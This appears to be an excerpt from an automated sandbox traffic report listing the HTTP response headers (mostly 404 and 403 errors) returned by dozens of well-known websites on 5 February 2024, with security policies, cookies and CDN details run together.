                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not Foundcache-control: no-store,no-cachepragma: no-cachetransfer-encoding: chunkedcontent-type: text/html; charset=utf-8server: request-context: appId=cid-v1:72342c18-c46f-45ce-b189-a032422cefbacontent-security-policy: default-src 'self';script-src 'self' 'sha256-7F67Tt3rqGzZ4RuGnAw8xbWeXLl7P0SNrI9EOIYYRdw=' 'nonce-vj3b31ZXmcuixZZGEZllBy8vGMrJQ3aG8oGiKWLE4Hw=';style-src 'self';font-src 'self' fonts.gstatic.com;img-src 'self' data: https://www.gravatar.com/avatar/;media-src 'none';object-src 'none';frame-ancestors 'self';frame-src 'self';report-uri https://uitgeverijdeviant.report-uri.com/r/t/csp/enforcex-frame-options: SAMEORIGINx-xss-protection: 1; mode=blockx-content-type-options: nosniffreferrer-policy: strict-origin-when-cross-originstrict-transport-security: max-age=31536000; includeSubDomains; preloadX-Powered-By: date: Mon, 05 Feb 2024 11:14:50 GMTset-cookie: SERVERID=api02; path=/; Secureconnection: close
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 05 Feb 2024 11:14:51 GMTContent-Type: text/html; charset=iso-8859-1Transfer-Encoding: chunkedConnection: closeCF-Cache-Status: DYNAMICServer: cloudflareCF-RAY: 850abb6d0f412439-ATL
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundCache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Mon, 05 Feb 2024 11:14:51 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedContent-Security-Policy: require-trusted-types-for 'script';report-uri /cspreportContent-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' https: http:;object-src 'none';base-uri 'self';report-uri /cspreportReport-To: {"group":"coop_gse_qebhlk","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/gse_qebhlk"}]}Cross-Origin-Opener-Policy-Report-Only: same-origin; report-to="coop_gse_qebhlk"X-Content-Type-Options: nosniffX-XSS-Protection: 1; mode=blockServer: GSEAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Connection: close
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 05 Feb 2024 11:14:51 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=ThDNKGDSoMVOFXVBpiNJR7oFN3%2FQk82qNnXV%2BPR27TGOoecqDbiQwmPTcoqhKgxuCC2%2F21Nrg2vhpOuLzbFpJn9PlKUKJQ5oSRZmTssqaWF71lugaXxLN2LyFWfy%2FHvCfat5KXrbGu8%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 850abb6d8f0d7b9c-ATLalt-svc: h3=":443"; ma=86400
                Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Mon, 05 Feb 2024 11:14:51 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeX-Frame-Options: SAMEORIGINReferrer-Policy: same-originCache-Control: max-age=15Expires: Mon, 05 Feb 2024 11:15:06 GMTSet-Cookie: __cf_bm=WwDsDukp_YDhK47LsOLJF_f6r.mR7Vw8Abn0xPZ6qc0-1707131691-1-AQisbQbe15NUYYAtkbEwWZ9Elw6Q9W11IhJgQEaCPS6urIjQFa99ulpwxIhOZWuJm1nzKa3XmgZY+Hh7EjUVuaQ=; path=/; expires=Mon, 05-Feb-24 11:44:51 GMT; domain=.autoplay.cloud; HttpOnly; Secure; SameSite=NoneServer: cloudflareCF-RAY: 850abb6fe9bc53d4-ATLalt-svc: h3=":443"; ma=86400
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 05 Feb 2024 11:14:51 GMTServer: ApacheUpgrade: h2,h2cConnection: Upgrade, closeLast-Modified: Thu, 06 Oct 2022 20:52:18 GMTAccept-Ranges: bytesContent-Length: 2361Vary: Accept-EncodingContent-Type: text/html
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeserver: envoydate: Mon, 05 Feb 2024 11:14:50 GMTcontent-security-policy: frame-ancestors https://*.booking.com 'self'; report-uri https://nellie.booking.com/csp-report-uri?type=block&tag=212&pid=b3db4f1536220013&e=UmFuZG9tSVYkc2RlIyh9YSWKtKO5TxgOpTwVTPfHZKNW3Hcrm1RLgf1YHftP-MD0Nj5eWPMs1KD5HVRMSfgXxlrKZIDoU2Tgcontent-security-policy-report-only: base-uri 'none'; connect-src saa.booking.com secure.booking.com reports.booking.com privacyportal-eu.onetrust.com geolocation.onetrust.com cdn.cookielaw.org www.google-analytics.com *.perimeterx.net *.pxchk.net *.px-cdn.net *.px-client.net *.px-cloud.net 'self' 'report-sample'; default-src *.bstatic.com bstatic.com 'self'; frame-src https://www.youtube.com/embed/Vv4w5SmRkss *.bstatic.com https://www.google.com bstatic.com www.booking.com secure.booking.com paymentcomponent.booking.com 'self'; img-src 'self' data: www.booking.com graph.facebook.com cdn.cookielaw.org account.booking.com *.bstatic.com bstatic.com *.static.booking.cn www.google-analytics.com www.google.com stats.g.doubleclick.net *.px-cloud.net *.perimeterx.net www.gstatic.com; object-src 'none'; report-uri https://nellie.booking.com/csp-report-uri?type=report&tag=213&pid=b3db4f1536220013&e=UmFuZG9tSVYkc2RlIyh9YSWKtKO5TxgOpTwVTPfHZKNW3Hcrm1RLgf1YHftP-MD0Nj5eWPMs1KD5HVRMSfgXxlrKZIDoU2Tg; script-src saa.booking.com *.bstatic.com bstatic.com *.static.booking.cn www.google.com www.google-analytics.com cdn.cookielaw.org geolocation.onetrust.com 'self' 'nonce-6ejAOTd8UT2ZFAN' 'report-sample'; style-src *.bstatic.com bstatic.com *.static.booking.cn 'self' 'unsafe-inline'x-xss-protection: 1; mode=blockstrict-transport-security: max-age=86400; includeSubDomainsX-Cache: Error from cloudfrontVia: 1.1 85d554a60ac318933f765b1c3e116f30.cloudfront.net (CloudFront)X-Amz-Cf-Pop: ATL59-P5X-Amz-Cf-Id: QU5cviGa22iKRK-3SQwiISGFojqt13VxSKiT7FrUy1AD_vLjTgkjVQ==
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundCache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Mon, 05 Feb 2024 11:14:51 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedContent-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' https: http:;object-src 'none';base-uri 'self';report-uri /cspreportContent-Security-Policy: require-trusted-types-for 'script';report-uri /cspreportReport-To: {"group":"coop_gse_qebhlk","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/gse_qebhlk"}]}Cross-Origin-Opener-Policy-Report-Only: same-origin; report-to="coop_gse_qebhlk"X-Content-Type-Options: nosniffX-XSS-Protection: 1; mode=blockServer: GSEAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Connection: close
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 05 Feb 2024 11:14:51 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closex-powered-by: PHP/7.0.33-6+ubuntu14.04.1+deb.sury.org+3expires: Thu, 19 Nov 1981 08:52:00 GMTCache-Control: no-store, no-cache, must-revalidatepragma: no-cacheset-cookie: warriorplus=c14l8412vca5e543ogr2qmo762; expires=Wed, 06-Mar-2024 11:14:51 GMT; Max-Age=2592000; path=/set-cookie: rqtok=374744f34b056f2b4672; expires=Tue, 06-Feb-2024 11:14:51 GMT; Max-Age=86400; path=/set-cookie: TOKEN=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; Max-Age=0; path=/set-cookie: TOKEN=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; Max-Age=0; path=/set-cookie: PASSWORD=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; Max-Age=0; path=/set-cookie: PASSWORD=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; Max-Age=0; path=/set-cookie: notifications=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; Max-Age=0; path=/set-cookie: notifications_aff=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; Max-Age=0; path=/set-cookie: notifications_sales=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; Max-Age=0; path=/set-cookie: wpg=gw1s33s7p59ds9s2; expires=Tue, 04-Feb-2025 11:14:51 GMT; Max-Age=31536000; path=/set-cookie: wpg=gw1s33s7p59ds9s2; expires=Tue, 04-Feb-2025 11:14:51 GMT; Max-Age=31536000; path=/
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 05 Feb 2024 11:14:51 GMTServer: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9X-Powered-By: PHP/5.4.16Connection: closeTransfer-Encoding: chunkedContent-Type: text/html; charset=UTF-8
                Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Mon, 05 Feb 2024 11:14:51 GMTContent-Type: text/html; charset=UTF-8Content-Length: 4513Connection: closeX-Frame-Options: SAMEORIGINReferrer-Policy: same-originCache-Control: max-age=15Expires: Mon, 05 Feb 2024 11:15:06 GMTReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=Tj8dIEbTwSPdWNRznsFeewEw2uBurTvW5HG%2BPlLAwOevNGojn%2F26SKJGRDCitS6gkz%2BBMsqGNSmBc1Dxj89MlLsVbj4PzmK3u6CWH%2FhwR6epHZQPAd4IXlPagk4mp4ilDg%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 850abb72ea414503-ATLalt-svc: h3=":443"; ma=86400
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundCache-Control: no-cache, privateContent-Type: text/html; charset=UTF-8date: Mon, 05 Feb 2024 11:14:52 GMTServer: nginxVary: Accept-EncodingContent-Length: 6854Connection: Close
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 05 Feb 2024 11:14:52 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeX-Frame-Options: SAMEORIGINX-Content-Type-Options: nosniffLast-Modified: Mon, 05 Feb 2024 11:14:51 GMTExpires: Thu, 19 Nov 1981 08:52:00 GMTCache-Control: private, no-cache, max-age=0Link: </styles/fonts/fa/fa-regular-400-min.woff2?_v=5.15.3.1706539464>; rel=preload; as=font; crossorigin=anonymousVary: Accept-EncodingSet-Cookie: xf_csrf=_NnNhXcjjnO-7A8g; path=/; secureCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=awDfpweHRTLh2Do5qoCWylFboJgpuiEUMRdEESw4U9a3jCYb6lP6bXKHJ5dcPzxFz4Ezi8gAA4L1KNljSf%2F3BFhIdIDSqENAlN1QBUpXwVb7WurDcZ5A%2BsfRVps5wg0%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 850abb6ef93c7bae-ATLalt-svc: h3=":443"; ma=86400
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundCache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Mon, 05 Feb 2024 11:14:51 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedContent-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' https: http:;object-src 'none';base-uri 'self';report-uri /cspreportContent-Security-Policy: require-trusted-types-for 'script';report-uri /cspreportReport-To: {"group":"coop_gse_qebhlk","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/gse_qebhlk"}]}Cross-Origin-Opener-Policy-Report-Only: same-origin; report-to="coop_gse_qebhlk"X-Content-Type-Options: nosniffX-XSS-Protection: 1; mode=blockServer: GSEAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Connection: close
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/htmlServer: Microsoft-IIS/10.0X-Powered-By: ASP.NETStrict-Transport-Security: max-age=31536000; includeSubDomainsDate: Mon, 05 Feb 2024 11:14:52 GMTConnection: closeContent-Length: 1245Set-Cookie: visid_incap_2786379=P6p5ySXxTI29D8eLDfOFoSvDwGUAAAAAQUIPAAAAAABWDxaPAifAZENIvBKIunF8; expires=Tue, 04 Feb 2025 10:21:10 GMT; HttpOnly; path=/; Domain=.codere.com.coSet-Cookie: nlbi_2786379=5VIKOclosivXbhQKaJQkpgAAAABHFBG4vdmuxy6mQSvsEhco; path=/; Domain=.codere.com.coSet-Cookie: incap_ses_1816_2786379=nB8rDMrRxHTWIBA+arozGSvDwGUAAAAAM2AwV/yvpVYgUQE6hwe8qg==; path=/; Domain=.codere.com.coX-CDN: ImpervaX-Iinfo: 50-20036917-20036927 NNNN CT(119 138 0) RT(1707131690602 937) q(0 0 2 -1) r(4 4) U24
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 05 Feb 2024 11:14:52 GMTServer: Apache/2.4.41 (Ubuntu)Expires: 0Cache-Control: no-cache, no-store, max-age=0, must-revalidateX-Powered-By: JSP/2.2Set-Cookie: JSESSIONID=fAVl_OzmAbKHuY8hGNs8itqM.cmrsanmartin; path=/X-XSS-Protection: 1; mode=blockPragma: no-cacheX-Frame-Options: SAMEORIGINX-Robots-Tag: noindex,noarchiveX-Content-Type-Options: nosniffStrict-Transport-Security: max-age=31536000 ; includeSubDomainsContent-Type: text/html;charset=UTF-8Content-Language: es-CLConnection: closeTransfer-Encoding: chunked
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 05 Feb 2024 11:14:52 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeStrict-Transport-Security: max-age=31536000; includeSubDomains; preloadX-Frame-Options: SAMEORIGINX-Xss-Protection: 1; mode=blockCF-Cache-Status: HITServer: cloudflareCF-RAY: 850abb7368b6139b-ATL
                Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Mon, 05 Feb 2024 11:14:53 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeAccept-CH: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UACross-Origin-Embedder-Policy: require-corpCross-Origin-Opener-Policy: same-originCross-Origin-Resource-Policy: same-originOrigin-Agent-Cluster: ?1Permissions-Policy: accelerometer=(),autoplay=(),browsing-topics=(),camera=(),clipboard-read=(),clipboard-write=(),geolocation=(),gyroscope=(),hid=(),interest-cohort=(),magnetometer=(),microphone=(),payment=(),publickey-credentials-get=(),screen-wake-lock=(),serial=(),sync-xhr=(),usb=()Referrer-Policy: same-originX-Frame-Options: SAMEORIGINcf-mitigated: challengeCache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0Expires: Thu, 01 Jan 1970 00:00:01 GMTServer: cloudflareCF-RAY: 850abb794fa11395-ATLalt-svc: h3=":443"; ma=86400
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/htmlDate: Mon, 05 Feb 2024 11:14:52 GMTEtag: "62650964-3feb"Logid: 8900799866678868342P3p: CP=" OTI DSP COR IVA OUR IND COM "Server: nginxSet-Cookie: PANPSC=; expires=Fri, 01-Apr-1900 00:00:00 GMT; path=/; domain=pan.baidu.com; HttpOnly;Set-Cookie: BAIDUID=28BC2B6ED4C1D9D9F81E1A842D564B3F:FG=1; expires=Tue, 04-Feb-25 11:14:52 GMT; max-age=31536000; path=/; domain=.baidu.com; version=1Vary: Accept-EncodingVary: Accept-EncodingX-Powered-By: BaiduCloudYld: 8900799866678868342Yme: ZIGW+iw9QE0XaisBS3b+qnFNveUfQhz9owpNwyaGzq/uEjV2eCc=Connection: closeTransfer-Encoding: chunked
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundCache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Mon, 05 Feb 2024 11:14:52 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedContent-Security-Policy: require-trusted-types-for 'script';report-uri /cspreportContent-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' https: http:;object-src 'none';base-uri 'self';report-uri /cspreportReport-To: {"group":"coop_gse_qebhlk","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/gse_qebhlk"}]}Cross-Origin-Opener-Policy-Report-Only: same-origin; report-to="coop_gse_qebhlk"X-Content-Type-Options: nosniffX-XSS-Protection: 1; mode=blockServer: GSEAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Connection: close
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closex-powered-by: PHP/8.1.26expires: Wed, 11 Jan 1984 05:00:00 GMTcache-control: no-cache, must-revalidate, max-age=0content-type: text/html; charset=UTF-8link: <https://mobilsam.com/wp-json/>; rel="https://api.w.org/"x-litespeed-cache-control: public,max-age=3600x-litespeed-tag: 106_HTTP.404,106_404,106_URL.ba909b44cf9b50134ed01a5f820a730d,106_x-litespeed-cache: misstransfer-encoding: chunkeddate: Mon, 05 Feb 2024 11:14:52 GMTserver: LiteSpeedplatform: hostingercontent-security-policy: upgrade-insecure-requestsalt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 05 Feb 2024 11:14:52 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeVary: Accept-EncodingServer: nginx/1.17.9X-Powered-By: PHP/8.2.4Set-Cookie: osCsid=c617b93e76f68699718ceaa19a2de8d9; expires=Mon, 04 Mar 2024 11:14:52 GMT; Max-Age=2419200; path=/; domain=.imvu.com; HttpOnlyExpires: Thu, 19 Nov 1981 08:52:00 GMTCache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0Pragma: no-cacheSet-Cookie: osCsid=c617b93e76f68699718ceaa19a2de8d9; expires=Mon, 04 Mar 2024 11:14:52 GMT; Max-Age=2419200; path=/; domain=.imvu.com; secure; HttpOnly; SameSite=Nonex-imvu-rnd: WR2Gp0kAcontent-language: pt-br
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 05 Feb 2024 11:14:53 GMTContent-Type: text/html;charset=utf-8Transfer-Encoding: chunkedConnection: closex-zm-trackingid: v=2.0;clid=aw1;rid=WEB_2f7cfeb0ef566b5f9fe64326c5eb5852x-content-type-options: nosniffcontent-security-policy: upgrade-insecure-requests; default-src https://*.zoom.us https://zoom.us blob: 'self'; img-src https: about: blob: data: 'self'; style-src https: safari-extension: chrome-extension: 'unsafe-inline' data: 'self'; font-src https: safari-extension: chrome-extension: blob: data: 'self'; connect-src * about: blob: data: 'self'; media-src * rtmp: blob: data: 'self'; frame-src https: ms-appx-web: zoommtg: zoomus: wvjbscheme: zoomprc: data: blob: 'self'; object-src 'none'; base-uri 'none';script-src 'self' 'strict-dynamic' 'nonce-iHeF8ClCSkGydn8_YmnXmA' 'unsafe-inline' blob: https:;x-frame-options: SAMEORIGINset-cookie: zm_aid=; Max-Age=0; Expires=Thu, 01 Jan 1970 00:00:10 GMT; Domain=zoom.us; Path=/; Secure; HttpOnlyx-zm-zoneid: VAcontent-language: en-USCF-Cache-Status: DYNAMICSet-Cookie: zm_haid=; Max-Age=0; Expires=Thu, 01 Jan 1970 00:00:10 GMT; Domain=zoom.us; Path=/; Secure; HttpOnlySet-Cookie: zm_tmaid=; Max-Age=0; Expires=Thu, 01 Jan 1970 00:00:10 GMT; Domain=zoom.us; Path=/; Secure; HttpOnly
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 05 Feb 2024 11:14:53 GMTContent-Type: text/htmlContent-Length: 7358Connection: closeServer: nginx/1.12.2Vary: Accept-EncodingETag: "5df8f9a3-1cbe"
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundCache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Mon, 05 Feb 2024 11:14:52 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedReport-To: {"group":"coop_gse_qebhlk","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/gse_qebhlk"}]}Content-Security-Policy: require-trusted-types-for 'script';report-uri /cspreportContent-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' https: http:;object-src 'none';base-uri 'self';report-uri /cspreportCross-Origin-Opener-Policy-Report-Only: same-origin; report-to="coop_gse_qebhlk"X-Content-Type-Options: nosniffX-XSS-Protection: 1; mode=blockServer: GSEAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Connection: close
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not Foundcontent-type: text/html;charset=utf-8vary: Accept-Encodingset-cookie: sc-wcid=be8e7c19-3bb8-4c8a-aaf1-075b8b3f9a02; Path=/; Domain=.snapchat.com; Expires=Tue, 06-Feb-2024 11:14:53 GMT; Max-Age=86400; Secureexpires: Thu, 01 Jan 1970 00:00:00 GMTstrict-transport-security: max-age=31536000; includeSubdomainsx-xss-protection: 1; mode=blockx-content-type-options: nosniffx-frame-options: allow-from https://iframe.arkoselabs.comcache-control: no-cache, no-store, max-age=0content-security-policy: default-src 'self'; script-src 'self' 'sha256-93ejg12EAT+6aW5hUFXASC0su+RZ+zOjgnJgLqJaLmY=' https://sc-static.net https://www.google-analytics.com https://www.googletagmanager.com https://snap-api.arkoselabs.com/ https://www.google.com/recaptcha/ https://www.google.com/js https://www.gstatic.com/ https://apis.google.com/ https://tr.snapchat.com/config/com/49966cac-c23c-49c7-9ff9-c7f8f6f771ba.js; font-src 'self' https://snapnet-cdn.storage.googleapis.com *.sc-cdn.net data:; style-src 'self' 'unsafe-inline' https://snapnet-cdn.storage.googleapis.com *.sc-cdn.net blob:; frame-src 'self' https://iframe.arkoselabs.com https://snap-api.arkoselabs.com https://tr.snapchat.com https://www.google.com/ https://client-api.arkoselabs.com/; connect-src 'self' https://graphql.contentful.com/content/v1/spaces/kp51zybwznx4/environments/master https://snap-api.arkoselabs.com/ https://tr.snapchat.com https://www.snapchat.com https://accounts.snapchat.com https://web-frontend-dot-sc-analytics.appspot.com https://us-central1-gcp.api.snapchat.com https://staging-us-central1-gcp.api.snapchat.com https://www.google-analytics.com https://sentry.sc-prod.net https://cdn.contentful.com/spaces/kp51zybwznx4/ https://accounts.snap.com/ https://web.snapchat.com/ https://gcp.api.snapchat.com https://story.snapchat.com https://aws.api.snapchat.com/snapchat.cdp.cof.CircumstancesService/targetingQuery https://aws.api.snapchat.com/snapchat.ab.exposure_service.ExposureService/BatchUpdateAbExposure https://chat-gold.sc-corp.net; img-src 'self' data: https://ssl.gstatic.com https://www.snapchat.com https://sc-oauth2-client-icons-dev.storage.googleapis.com https://sc-oauth2-client-icons.storage.googleapis.com https://storage.googleapis.com https://www.google-analytics.com https://images.ctfassets.net https://sdk.bitmoji.com; media-src 'self' https://storage.googleapis.com; form-action 'self' https://*.snap.com https://*.snapchat.com https://*.snap-dev.net https://*.sc-corp.net https://localhost:3000; frame-ancestors https://iframe.arkoselabs.com https://profile.softserve-local-prod.snap-dev.net https://preproduction-dot-snap-profile-manager.snapchat.com https://hotfix-dot-snap-profile-manager.snapchat.com https://snap-profile-manager.snapchat.com https://profile-preprod.snapchat.com https://business-preprod.snapchat.com https://profile.snapchat.com https://business.snapchat.com https://enterprise.snap.com;x-content-security-policy: default-src 'self'; script-
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 05 Feb 2024 11:14:53 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeStrict-Transport-Security: max-age=31536000; includeSubDomains; preloadX-Frame-Options: SAMEORIGINX-Xss-Protection: 1; mode=blockCF-Cache-Status: DYNAMICServer: cloudflareCF-RAY: 850abb7baea40701-ATL
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 05 Feb 2024 11:14:53 GMTServer: ApacheX-Frame-Options: SAMEORIGINStrict-Transport-Security: max-age=31536000; includeSubDomainsContent-Length: 954Connection: closeContent-Type: text/html; charset=UTF-8
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 05 Feb 2024 11:14:53 GMTContent-Type: text/htmlContent-Length: 7358Connection: closeServer: nginx/1.12.2Vary: Accept-EncodingETag: "5df8f9a3-1cbe"
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundCache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Mon, 05 Feb 2024 11:14:53 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedReport-To: {"group":"coop_gse_qebhlk","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/gse_qebhlk"}]}Content-Security-Policy: require-trusted-types-for 'script';report-uri /cspreportContent-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' https: http:;object-src 'none';base-uri 'self';report-uri /cspreportCross-Origin-Opener-Policy-Report-Only: same-origin; report-to="coop_gse_qebhlk"X-Content-Type-Options: nosniffX-XSS-Protection: 1; mode=blockServer: GSEAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Connection: close
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 05 Feb 2024 11:14:53 GMTServer: Apache/2.4.29 (Ubuntu)Content-Length: 282Connection: closeContent-Type: text/html; charset=iso-8859-1
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 05 Feb 2024 11:14:53 GMTServer: Oracle-Application-Server-11g Oracle-Web-Cache-11g/11.1.1.6.0 (N;ecid=1409681332155852,0:1)Content-Type: text/html; charset=iso-8859-1Content-Length: 194Connection: close
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 05 Feb 2024 11:14:53 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=j1NQmeDGwT4WqqDTUDXGAhu0PP9D2Tbo1BhthUi5TUJJtjCmuK3djBde99Qv3hTQe7eR3W0ruJQa47TqPxHETmSKhhpYhRq%2Fa7WKjrk5sZQzg%2Bo5DQ4lsSVH9R4K4TNQOGcd05L9dzeU54s%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 850abb7a6d1d672f-ATL
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not Foundcontent-type: text/html;charset=utf-8vary: Accept-Encodingset-cookie: sc-wcid=22d74ccb-015c-4e3d-b87e-d8ca27d63248; Path=/; Domain=.snapchat.com; Expires=Tue, 06-Feb-2024 11:14:53 GMT; Max-Age=86400; Secureexpires: Thu, 01 Jan 1970 00:00:00 GMTstrict-transport-security: max-age=31536000; includeSubdomainsx-xss-protection: 1; mode=blockx-content-type-options: nosniffx-frame-options: allow-from https://iframe.arkoselabs.comcache-control: no-cache, no-store, max-age=0content-security-policy: default-src 'self'; script-src 'self' 'sha256-93ejg12EAT+6aW5hUFXASC0su+RZ+zOjgnJgLqJaLmY=' https://sc-static.net https://www.google-analytics.com https://www.googletagmanager.com https://snap-api.arkoselabs.com/ https://www.google.com/recaptcha/ https://www.google.com/js https://www.gstatic.com/ https://apis.google.com/ https://tr.snapchat.com/config/com/49966cac-c23c-49c7-9ff9-c7f8f6f771ba.js; font-src 'self' https://snapnet-cdn.storage.googleapis.com *.sc-cdn.net data:; style-src 'self' 'unsafe-inline' https://snapnet-cdn.storage.googleapis.com *.sc-cdn.net blob:; frame-src 'self' https://iframe.arkoselabs.com https://snap-api.arkoselabs.com https://tr.snapchat.com https://www.google.com/ https://client-api.arkoselabs.com/; connect-src 'self' https://graphql.contentful.com/content/v1/spaces/kp51zybwznx4/environments/master https://snap-api.arkoselabs.com/ https://tr.snapchat.com https://www.snapchat.com https://accounts.snapchat.com https://web-frontend-dot-sc-analytics.appspot.com https://us-central1-gcp.api.snapchat.com https://staging-us-central1-gcp.api.snapchat.com https://www.google-analytics.com https://sentry.sc-prod.net https://cdn.contentful.com/spaces/kp51zybwznx4/ https://accounts.snap.com/ https://web.snapchat.com/ https://gcp.api.snapchat.com https://story.snapchat.com https://aws.api.snapchat.com/snapchat.cdp.cof.CircumstancesService/targetingQuery 